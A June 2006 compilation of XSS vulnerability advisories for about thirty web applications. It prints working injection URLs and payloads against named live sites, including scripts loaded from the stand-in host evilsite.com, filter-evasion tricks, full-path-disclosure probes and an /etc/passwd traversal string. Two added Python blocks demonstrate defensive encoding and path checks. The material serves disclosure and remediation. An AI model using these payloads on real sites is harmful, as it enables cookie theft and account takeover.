List of XSS vulnerabilities received between 06/02/06 and 06/11/06. Affected software includes: LabWiki 1.0, LarkinWEB Database Development, Web Site Design Marketing and Advertising System, ASPScriptz Guest Book 2.0, ParticleSoft Whois v1.0.3, ParticleSoft Wiki v1.0.2, GANTTy v1.0.3, MyBB 1.1.2 New XSS, PBLGuestbook v1.31, ViArt Shop v2.5.5 Free (and possibly Light, Standard, and Enterprise), E-Dating System, vSCAL and vREAL v1.0, Easy Ad-Manager, Ez Ringtone Manager, tikiwiki 1.9.x, Skoom i.List 1.5, OkMall v1.0, QuickLinks v1.1, OKArticles v1.0, iFoto v0.20-06/06/06, phazizGuestbook v2.0, Ticket Booking Script, MobeSpace v2.0, TinyMuw v1.0, Contensis CMS, Daum Search, DaNaWa Search, DreamWiz Search.
XSS Vulnerability On LarkinWEB Database Development, Web Site Design Marketing and Advertising System.
Running HTML code, JScript etc...
XSS Vulnerability URL : http://www.larkinweb.com/secure/error.asp?msg=[XSS]
Example:
http://www.larkinweb.com/secure/error.asp?msg=<script>window.location.href="http://members.lycos.co.uk/spymeta/hacked..jpg"</script>
Attackers can hack this system's administrator cookies and hack this system...
Powered / Credit : SPYMETA
MSN & eMail : spymeta@yahoo.com
----------------------------------------------------------------------------------------------------
From: luny@youfucktard.com
To: bugtraq@securityfocus.com
Subject: LabWiki v1.0
LabWiki 1.0
Homepage:
http://www.bioinformatics.org/phplabware/labwiki/index.php
Affected files:
search.php
The search input box does not sanitize user input before dynamically generating it.
XSS Proof of concept:
"><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><"
----------------------------------------------------------------------------------------------------
ASPScriptz Guest Book 2.0 Remote XSS -
-= http://colander.altervista.org/advisory/ASzGB.txt =-
------------------------------------------------------------------
-= ASPScriptz Guest Book 2.0 =-
Omnipresent
May 18, 2006
Vulnerability(s):
----------------
XSS Attack
Product:
--------
ASPScriptz Guest Book 2.0
Vendor:
--------
http://www.aspscriptz.com
Description of product:
-----------------------
Guestbook is a free open source guestbook. Simply download it and unzip it and upload it into the root directory of your
server. It is working now. Smilies support is also added in this version. Admin can disable or enable HTML support. Admin
section is also included.
Vulnerability / Exploit:
------------------------
From line 109 to line 113, there is the vulnerable code:
[...]
GBOOK_UNAME = REQUEST.FORM("GBOOK_UNAME")
GBOOK_EMAIL = REQUEST.FORM("GBOOK_EMAIL")
GBOOK_CITY = REQUEST.FORM("GBOOK_CITY")
GBOOK_COU = REQUEST.FORM("GBOOK_COU")
GBOOK_WWW = REQUEST.FORM("GBOOK_WWW")
[...]
As you can see, the variables:
GBOOK_UNAME
GBOOK_CITY
GBOOK_COU
are not properly sanitized before being used, so a remote attacker can inject arbitrary HTML code.
So, to remove the bug, the programmer can modify the source code with a simple replace().
PoC / Proof of Concept of SQL Injection:
----------------------------------------
Not very hard.. :D Just put <script>alert("XSS")</script> in the Name, City and Country fields.
Vendor Status
-------------
[2006/06/05] Vendor Informed!
Credits:
--------
omnipresent
omnipresent@email.it
----------------------------------------------------------------------------------------------------
ParticleSoft Whois v1.0.3
Homepage:
http://www.particlesoft.net/particlewhois/
XSS Proof of concept via URL injection:
http://whois.particlesoft.net/index.php?do=runcheck&target="><iframe src=http://evilsite.com/scriptlet.html <<"&ext=all
XSS Via input box:
"><iframe src=http://evilsite.com/scriptlet.html <<"
----------------------------------------------------------------------------------------------------
ParticleSoft Wiki v1.0.2
Affected files:
input boxes on editing pages:
XSS Proof of concept:
We notice br tags are allowed, so by using a STYLE attribute with a comment to break up "expression" we can create an XSS vuln:
Put the following in when editing a page:
<br IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
Thanks to Rsnake & Roman Ivanov for the above xss example code.
----------------------------------------------------------------------------------------------------
GANTTy v1.0.3
Homepage:
http://www.gantty.com
Affected files:
index.php
XSS Vulnerabilities PoC:
XSS Vulnerability:
http://www.example.com/index.php?action=login&message=<IMG SRC=javascript:alert('XSS')>+email&lang=
Full path disclosure error:
http://www.example.com/index.php?action=authenticate&lang='
Error: FILE /var/www/username/actions/authenticate.php
----------------------------------------------------------------------------------------------------
// MyBB 1.1.2 New XSS
File :- private.php
Ver. :- $do = $mybb->input['do'];
Line :- 260
Action :- Preview
HTTP Proof :-
/mybb/private.php?to=asda&subject=asd%3E&font=-&size=-&color=-&mode=advanced&message=sd&options%5Bsavecopy%5D=yes&options%5Breadreceipt%5D=yes&action=do_send&pmid=&do=D3vil-0x1%22%3E%3Cscript%3Ealert(1);%3C/script%3E&preview=Preview
// Code
<input type="hidden" name="do" value="D3vil-0x1"><script>alert(1);</script>" />
//
PBLGuestbook v1.31
Homepage:
http://www.pixelatedbylev.com/
Affected files:
input boxes of the guestbook.
XSS Vulnerabilities PoC:
I noticed that common tags like <script> are filtered into the words "SCRIPT BLOCKED" in this guestbook; however, img tags as well as others go unfiltered in the Name, Email, and Website boxes. In turn, this could cause an XSS attack to occur. For PoC just enter: <IMG SRC=javascript:alert('XSS')> in any of these boxes.
----------------------------------------------------------------------------------------------------
ViArt Shop v2.5.5 Free (and possibly Light, Standard, and Enterprise)
Author's Site: http://www.codetosell.com/
+-[Examples:]--------------------------------------------------+
XSS:
/forum.php?forum_id="><script>alert('XSS');</script>&category_id=1
/reviews.php?category_id=0&item_id=4&rnd=1149618267&action=1&item_id="><script>alert('XSS');</script>&category_id=0&recommended=1&rating=0&summary=1&comments=1&user_name=1
+-[Notes:]-----------------------------------------------------+
Vulnerabilities found on: 6 June 2006
Author(s) Informed on: 7 June 2006
Author(s) Response: 7 June 2006
Author(s) Fix: 7 June 2006
Author's Fix: http://www.codetosell.com/downloads/xss_fix.zip
JohnC@NoBytes.com
http://www.NoBytes.com
----------------------------------------------------------------------------------------------------
E-Dating System
Homepage:
http://www.scriptsez.net/
Affected files:
Input boxes.
cindex.php
Description:
A Professional dating system that uses flatfiles instead of MySQL.
XSS Vulnerabilities PoC:
The input boxes for sending a message and editing your profile do not properly filter user input before generating it.
The script adds backslashes to ' and " but we can easily get around this by changing ' into '. For PoC input the
following in any of the above boxes mentioned:
<IMG SRC=javascript:alert('XSS')>
Full path disclosure error by URL injection of trying to read a nonexistent message:
http://www.example.com/cindex.php?action=dologin&nav=messagebox&do=read&id=999720979&st=1
Warning: rename(files/rofl/999720979&~@&1.txt,files/rofl/999720979&~@&0.txt): No such file or directory in /home/www/domain/demo/dating/gmain.php on line 733
We now know the dir /files/username/ is where we can view users' profiles, data and messages; this dir is also said to be chmoded to 777 in the install instructions. Since none of the data was sanitized by the input box before being stored in this flatfile, this data will also create XSS examples, plus it also lets us view any user's private messages in plain text format as well.
Another XSS Vuln via id:
http://www.example.com/cindex.php?action=dologin&nav=messagebox&do=read&id=<IMG SRC=javascript:alert('XSS')>&st=1
----------------------------------------------------------------------------------------------------
vSCAL and vREAL v1.0
Homepage:
http://www.babykatiemedia.com/
Affected files:
index.php
myslideshow.php
XSS Vulnerability via lid variable:
http://www.example.com/vscal/index.php?page=showlisting&lid=<SCRIPT%20SRC=evilsite.com//xss.js></SCRIPT>
XSS Vulnerability via myslideshow.php
http://www.example.com/vscal/myslideshow.php?dir=./listings/317/images/&title=listing+317:+1966+Buick+<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>
Chemical Directory v.unknown (doesn't say on website)
Homepage:
http://www.scriptsez.net/
Affected files:
dictionary.php
XSS Vulnerability via keyword variable:
http://www.example.com/dictionary.php?action=browse&keyword=e[SCRIPT SRC=http://evilsite.com/xss.js][/SCRIPT]
----------------------------------------------------------------------------------------------------
Easy Ad-Manager v. (unknown, not listed on homepage)
Homepage:
http://www.scriptsez.net
Affected files:
details.php
XSS Vulnerability with full path disclosure:
http://www.example.com/eam/details.php?do=load&mbid=/<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>
Warning: fopen(stats//This is remote text via xss.js located at evilsite.combanner_cookie=visited%3Bvisited%3B.vis): failed to open stream: No such file or directory in /home/www/domainname/demo/eam/details.php on line 268
Warning: fwrite(): supplied argument is not a valid stream resource in /home/www/domain/demo/eam/details.php on line 269
Warning: fclose(): supplied argument is not a valid stream resource in /home/www/domain/demo/eam/details.php on line 270
Warning: Cannot modify header information - headers already sent by (output started at /home/www/domain/demo/eam/details.php:268) in /home/www/domain/demo/eam/details.php on line 272
----------------------------------------------------------------------------------------------------
Ez Ringtone Manager
Homepage:
http://www.scriptsez.net
Affected files:
player.php
search input box.
XSS Vulnerabilities:
http://example.com/ringtones/player.php?action=preview&id=<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>&cat=LG%20Mobiles
The search box doesn't properly filter user input. Tags like <script> are filtered, and backslashes are added for ' and ".
We can get around this by simply using an <img> tag and ' for '. PoC:
<IMG SRC=javascript:alert('XSS')>
----------------------------------------------------------------------------------------------------
This release fixes a recently declared XSS vulnerability. Anyone using tikiwiki 1.9.x should upgrade asap.
http://tikiwiki.org/tiki-read_article.php?articleId=131
----------------------------------------------------------------------------------------------------
[MajorSecurity #10]i.List <= 1.5 - XSS
----------------------------------------
Software: i.List
Version: <=1.5
Type: XSS
Date: June, 8th 2006
Vendor: Skoom
Page: http://skoom.de
Credits:
-------------------------------
David 'Aesthetico' Vieira-Kurz
http://www.majorsecurity.de
Affected Products:
-------------------------------
i.List 1.5 and prior
Description:
-------------------------------
i.List is a php/mysql TOPLIST script.
Requirements:
-------------------------------
register_globals = On
Vulnerability:
-------------------------------
Input passed to the Inputbox in "search.php", the 'URL' inputbox
and 'ButtonURL' in "add.php" is not properly filtered and verified, before it is used.
This can be exploited to execute evil XSS-code.
Solution:
-------------------------------
Edit the source code to ensure that input is properly sanitised.
Set "register_globals" to "Off".
Exploitation:
-------------------------------
In the inputbox of /search.php:
Search for: <script>alert("MajorSecurity")</script>
In the inputbox 'URL' of add.php:
Type in as URL: <script>alert("MajorSecurity")</script>
In the inputbox 'ButtonURL' of add.php:
Type in as URL: <script>alert("MajorSecurity")</script>
----------------------------------------------------------------------------------------------------
OkMall v1.0
Homepage:
http://www.okscripts.com/
Affected files:
search.php
XSS Vulnerabilities:
The search inputbox doesn't properly filter user input before generating it. Backslashes are added but we can easily
evade this.
For PoC try putting [img src=lol.jpg] in the search box.
XSS vuln via URL injection with possible buffer overflow?:
http://www.example.com/okmall/demo/search.php?q=a%20%20b%20e%20&mcdir=5&page=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]
The above PoC creates the error msg:
Warning: fopen(http://xml.amazon.com/onca/xml3?locale=us&t=boxxnetcom-20&dev-t=06464ERBRYHMP1RY3W82&KeywordSearch=a__b_e_&sort=+pmrank&offer=All&mode=classical&type=lite&page=This is remote text via xss.jslocated at evilsite.com&f=xml): failed to open stream: HTTP request failed! HTTP/1.1 500 Server Error in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 59
Warning: feof(): supplied argument is not a valid stream resource in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 60
Warning: fread(): supplied argument is not a valid stream resource in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 61
and continuously outputs feof() and fread() error messages on the page. Buffer overflow?
------------------------
QuickLinks v1.1
Homepage:
http://www.okscripts.com/
Affected files:
cat.php
XSS Vulnerabilities:
The search inputbox doesn't properly filter user input before generating it. Backslashes are added but we can easily evade this. For PoC try putting [IMG SRC=javascript:alert(XSS)] in the search box.
XSS vuln via URL injection:
http://www.example.com/quicklinks/demo/search.php?q=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]
--------------------------------------
OKArticles v1.0
Homepage:
http://www.okscripts.com/
Affected files:
search.php
XSS Vulnerabilities:
The search inputbox doesn't properly filter user input before generating it. Backslashes are added but we can easily evade this. For PoC try putting [IMG SRC=javascript:alert(XSS)] in the search box.
XSS vuln via URL injection:
http://www.example.com/okarticles/demo/search.php?q=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]
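Several of the reports above describe the same defect: the application either backslash-escapes quotes (the "backslashes are added" behaviour in the E-Dating, Ez Ringtone, OkMall, QuickLinks and OKArticles posts), or rewrites known tags (the "SCRIPT BLOCKED" filter in PBLGuestbook), and then writes the value into a page. Neither step is HTML output encoding, which is the replace() the ASPScriptz post suggests. The following Python script is an added illustration, not code from any of the reported projects: it runs the payloads quoted in these reports through each of the three approaches and reports which ones still contain raw markup characters. The addslashes and blocklist functions are simplified stand-ins for the PHP behaviour described, and the guestbook table row is a constructed example.

```python
import html
import re

# Payloads quoted in the advisories above, copied here as constructed test input.
PAYLOADS = [
    '<script>alert("XSS")</script>',
    "<IMG SRC=javascript:alert('XSS')>",
    '"><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><"',
    '<br IMG STYLE="xss:expr/*XSS*/ession(alert(\'XSS\'))">',
]

# Conservative check: anything that could still open a tag, or close a
# quoted attribute, after the filter has run.
RAW_MARKUP = re.compile(r"<[A-Za-z/]|[\"']")


def addslashes(value):
    """Stand-in for PHP addslashes(): backslash-escape quotes and backslashes.
    This is SQL-oriented escaping; a browser ignores the backslashes entirely."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def block_script_tag(value):
    """Stand-in for a tag blocklist that rewrites <script> to 'SCRIPT BLOCKED'.
    Every other tag (img, iframe, br with a style attribute) passes through."""
    return re.sub(r"</?script[^>]*>", "SCRIPT BLOCKED", value, flags=re.IGNORECASE)


def html_encode(value):
    """Output encoding for an HTML text or quoted-attribute context:
    &, <, >, " and ' become entities, so the input can never start markup."""
    return html.escape(value, quote=True)


def survives(filter_fn, payload):
    """True if the filtered payload still carries raw markup characters."""
    return RAW_MARKUP.search(filter_fn(payload)) is not None


def audit(filter_fn, payloads=PAYLOADS):
    """Return the payloads that a filter fails to neutralize."""
    return [p for p in payloads if survives(filter_fn, p)]


def render_guestbook_entry(name, city, country):
    """The fix the guestbook needs: encode each field where it is written into HTML."""
    return (
        f"<tr><td>{html_encode(name)}</td>"
        f"<td>{html_encode(city)}</td>"
        f"<td>{html_encode(country)}</td></tr>"
    )


if __name__ == "__main__":
    filters = [("addslashes", addslashes),
               ("script blocklist", block_script_tag),
               ("HTML encoding", html_encode)]
    for label, fn in filters:
        print(f"{label}: {len(audit(fn))} of {len(PAYLOADS)} payloads still carry raw markup")
    print(render_guestbook_entry(PAYLOADS[1], "Rome", "IT"))
```

Run stand-alone, the script reports that addslashes and the blocklist leave every quoted payload with raw markup while HTML encoding leaves none; the rendered table row shows the image payload as harmless text. The check is deliberately conservative (a bare quote is harmless in a text node but not inside an attribute), which is the right bias when auditing a filter.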
----------------------------------------------------------------------------------------------------
iFoto v0.20-06/06/06
Homepage:
http://ifoto.ireans.com/
Affected files:
XSS Vulnerability:
The dir path to show the image is base64 encoded, so to attempt this XSS example we encode our code in base64.
The code we'll be using is javascript in an iframe tag. [IFRAME SRC="javascript:alert('XSS');"][/IFRAME]
http://www.example.com/?dir=Scene&file=PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+PC9JRlJBTUU+
----------------------------------------------------------------------------------------------------
phazizGuestbook v2.0
Homepage:
http://www.devhome.de/#english_version
Affected files:
input boxes of name, email, url, text.
XSS Vulnerability:
None of these input boxes sanitize user input before generating it. For PoC put <IMG SRC=javascript:alert('XSS')> in any of the above boxes.
----------------------------------------------------------------------------------------------------
Ticket Booking Script
Homepage:
http://www.mole.com.ua
Affected files:
input boxes on booking2.php
XSS Vulnerabilities:
The input boxes on booking2.php do not sanitize user input before generating it and then submitting it to a MySQL db. This can cause XSS examples as well as possible SQL injections.
For PoC just put <SCRIPT SRC=http://www.evilsite.com/xss.js></SCRIPT> in any of the input boxes
----------------------------------------------------------------------------------------------------
MobeSpace v2.0
Homepage:
http://mobescripts.com/
Affected files:
index.php
The input forms of:
- Profile
- Comments
- Uploading a file to your locker
- Posting in your blog
- Creating a caption for your pic
- Sending PM's
The input boxes of the above do not sanitize user input before generating it. For PoC just try putting:
<IMG SRC=javascript:alert('XSS')>
--------------------------------
XSS Vulnerability with SQL query error msg:
http://mobespace.com/index.php?browse=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]&q=&update=Search&page=search&search=Search+DataBase
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'This is remote text via xss.js located at evilsite.comPHPSESSID=004baf662f7d63889816e037a6bb2e56 WHERE name LIK
-------------------------------
Possible directory traversal via rss feed:
http://www.example.com/index.php?page=rss&uid=/../../../../etc/passwd/
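Two of the reports above concern a parameter that reaches the filesystem rather than the page: the iFoto "file" value, which arrives base64-encoded and is decoded before use, and the MobeSpace rss "uid" value, where "/../../../../etc/passwd/" walks out of the intended directory. The Python below is an added example, not code from either project, of the two checks a handler for such a parameter needs: decode first and validate the decoded value against an allowlist, then resolve the joined path and confirm it is still inside the base directory. The base directories and the "317.jpg" file name are constructed; the traversal string and the base64 payload are the ones quoted in the reports.

```python
import base64
import os
import re

# Allowlist for a decoded image file name: no separators, image extension only.
IMAGE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]*\.(?:jpe?g|png|gif)$", re.IGNORECASE)


def safe_path(base_dir, user_value):
    """Join a user-controlled value onto base_dir and return the resolved path
    only if it is still strictly inside base_dir, else None. realpath() collapses
    the ../ sequences (and any symlinks) before the containment check, and an
    absolute user value replaces base_dir in join() and is caught the same way."""
    base_real = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base_real, user_value))
    if target == base_real:
        return None  # empty or "." would hand back the directory itself
    if os.path.commonpath([base_real, target]) != base_real:
        return None  # escaped the base directory
    return target


def decode_param(encoded):
    """Decode a base64 parameter to text, or None if it is not valid base64/UTF-8.
    binascii.Error and UnicodeDecodeError are both ValueError subclasses."""
    try:
        return base64.b64decode(encoded, validate=True).decode("utf-8")
    except ValueError:
        return None


def resolve_image_param(base_dir, encoded_file):
    """iFoto-style handling: decode, validate the decoded value, then contain it.
    Validating only the encoded form would miss everything the report shows."""
    decoded = decode_param(encoded_file)
    if decoded is None or not IMAGE_NAME.match(decoded):
        return None
    return safe_path(base_dir, decoded)


if __name__ == "__main__":
    # Constructed base directories for the demo.
    listings = "/srv/app/listings"
    scene = "/srv/app/photos/Scene"
    print(safe_path(listings, "317"))                       # inside: resolved path
    print(safe_path(listings, "/../../../../etc/passwd/"))  # the rss uid value: None
    print(resolve_image_param(scene, "MzE3LmpwZw=="))       # "317.jpg" encoded: resolved path
    # The iFoto payload from the report decodes to an IFRAME tag, fails the allowlist: None
    print(resolve_image_param(scene, "PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+PC9JRlJBTUU+"))
```

Note that the containment check alone would accept the decoded IFRAME string, since it contains no path separators; it is the allowlist on the decoded value that rejects it, and it is the containment check that rejects the traversal, so a handler needs both.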
----------------------------------------------------------------------------------------------------
TinyMuw v1.0
Homepage:
http://www.l0j1k.com/tinyMuw/index.php
Affected files:
quickchat.php input box
videoPage.php
Input isn't sanitized before being generated in the quickchat.php chatbox. For PoC try putting:
<IMG SRC=javascript:alert('XSS')> in as your comment.
Full path disclosure error via URL Injection:
http://www.example.com/tinyMuw/videoPage.php?id=28'
Fatal error: Using $this when not in object context in /home/user/public_html/tinyMuw/tinyMuw/video.php on line 18
----------------------------------------------------------------------------------------------------
Hello,
I have discovered an XSS vulnerability in the Contensis CMS.
Input passed to the "search" parameter when performing
a search and various fields when using the search isn't properly sanitised ...
The vendor's own site was tested in Windows Internet Explorer - the search function did not work at all in my versions of Safari or Firefox:
http://www.contensis.net
Code example: <script>alert('hello world');</script>
thanks
smigoftheDump
----------------------------------------------------------------------------------------------------
Title:
[Kil13r-SA-20060609-1] Daum Search Cross-Site Scripting Vulnerability
Author:
Kil13r - http://www.kil13r.info/
Local / Remote:
Remote
Timeline:
2006/06/09 - Discovery
2006/06/09 - Vendor notification
2006/06/09 - Release
Affected version:
Not affected version:
Description:
Daum is an internet portal site, but it has a vulnerability.
An end user can run arbitrary JavaScript code in the search engine.
If a victim executes arbitrary JavaScript code, an attacker can steal the victim's cookie.
Proof of Concept code:
None
Proof of Concept example:
None
Proof of Concept screenshot:
http://www.kil13r.info/sa/xss/daumxss.jpg
----------------------------------------------------------------------------------------------------
Title:
[Kil13r-SA-20060609-2] DaNaWa Search Cross-Site Scripting Vulnerability
Author:
Kil13r - http://www.kil13r.info/
Local / Remote:
Remote
Timeline:
2006/06/09 - Discovery
2006/06/09 - Vendor notification
2006/06/09 - Release
Affected version:
Not affected version:
Description:
DaNaWa is a price comparison site, but it has a vulnerability.
An end user can run arbitrary JavaScript code in the search engine.
If a victim executes arbitrary JavaScript code, an attacker can steal the victim's cookie.
Proof of Concept code:
None
Proof of Concept example:
None
Proof of Concept screenshot:
http://www.kil13r.info/sa/xss/danawaxss.jpg
----------------------------------------------------------------------------------------------------
Title:
[Kil13r-SA-20060609-3] DreamWiz Search Cross-Site Scripting Vulnerability
Author:
Kil13r - http://www.kil13r.info/
Local / Remote:
Remote
Timeline:
2006/06/09 - Discovery
2006/06/09 - Vendor notification
2006/06/09 - Release
Affected version:
Not affected version:
Description:
DreamWiz is an internet portal site, but it has a vulnerability.
An end user can run arbitrary JavaScript code in the search engine.
If a victim executes arbitrary JavaScript code, an attacker can steal the victim's cookie.
Proof of Concept code:
None
Proof of Concept example:
None
Proof of Concept screenshot:
http://www.kil13r.info/sa/xss/dreamwizxss.jpg
----------------------------------------------------------------------------------------------------